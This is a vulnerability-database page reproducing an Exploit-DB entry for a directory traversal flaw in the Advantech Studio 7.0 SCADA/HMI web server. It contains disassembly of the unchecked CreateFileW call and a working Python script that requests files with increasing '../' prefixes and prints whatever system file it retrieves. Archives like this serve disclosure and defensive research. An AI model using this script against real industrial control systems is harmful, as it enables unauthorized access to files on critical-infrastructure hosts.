Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Advantech Studio 7.0 - SCADA/HMI Directory Traversal

🗓️ 04 Dec 2012 00:00:00Reported by Nin3Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

Advantech Studio v7.0 SCADA/HMI web server allows directory traversal via CreateFileW function, leading to unauthorized access to system files

Code
# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A

'''
Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe,
the web server is a standalone executable that is used along side every project'
to serve as a web based management system with the help of an activex.

The flaw occurs because of a lack of any check on the path of the file requested. in
function sub_401A90:

.text:00402A4A                 push    0               ; dwFlagsAndAttributes
.text:00402A4C                 push    3               ; dwCreationDisposition
.text:00402A4E                 push    3               ; dwShareMode
.text:00402A50                 push    80000000h       ; dwDesiredAccess
.text:00402A55                 mov     edx, [ebp+lpFileName]
.text:00402A58                 push    edx             ; lpFileName
.text:00402A59                 lea     ecx, [ebp+var_1C]
.text:00402A5C                 call    sub_401A90


sub_401A90 use CreateFileW function directly.

.text:00401A97                 push    0               ; hTemplateFile
.text:00401A99                 mov     eax, [ebp+dwFlagsAndAttributes]
.text:00401A9C                 push    eax             ; dwFlagsAndAttributes
.text:00401A9D                 mov     ecx, [ebp+dwCreationDisposition]
.text:00401AA0                 push    ecx             ; dwCreationDisposition
.text:00401AA1                 push    0               ; lpSecurityAttributes
.text:00401AA3                 mov     edx, [ebp+dwShareMode]
.text:00401AA6                 push    edx             ; dwShareMode
.text:00401AA7                 mov     eax, [ebp+dwDesiredAccess]
.text:00401AAA                 push    eax             ; dwDesiredAccess
.text:00401AAB                 mov     ecx, [ebp+lpFileName]
.text:00401AAE                 push    ecx             ; lpFileName
.text:00401AAF                 call    ds:CreateFileW

'''
import argparse
import httplib

MAX_NESTED_DIRECTORY = 32

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-d')
    parser.add_argument('-p')
    parser.add_argument('-f')  
    args = parser.parse_args()
    if args.d == None or args.p == None or args.f == None:
        print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini"
        return
    httpConn = httplib.HTTPConnection(args.d, int(args.p))
    for i in xrange(0, MAX_NESTED_DIRECTORY):
        temp = MakePath(args.f, i)
        httpConn.request('GET', temp)
        resp = httpConn.getresponse()
        content =  resp.read()
        if resp.status == 404:
            print 'Not found ' + temp
        else:
            print 'Found ' + temp
            print'------------------------------------------'
            print content
            print'---------------------------------------EOF'
            break
        
    
    
def MakePath(f, count):
    a = ""
    for i in xrange(0, count):
        a = a + "../"
    return a + f

if __name__ == "__main__":
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Dec 2012 00:00Current
7High risk
Vulners AI Score7
advantech studioscada/hmidirectory traversalweb servercreatefilewunauthorized access
33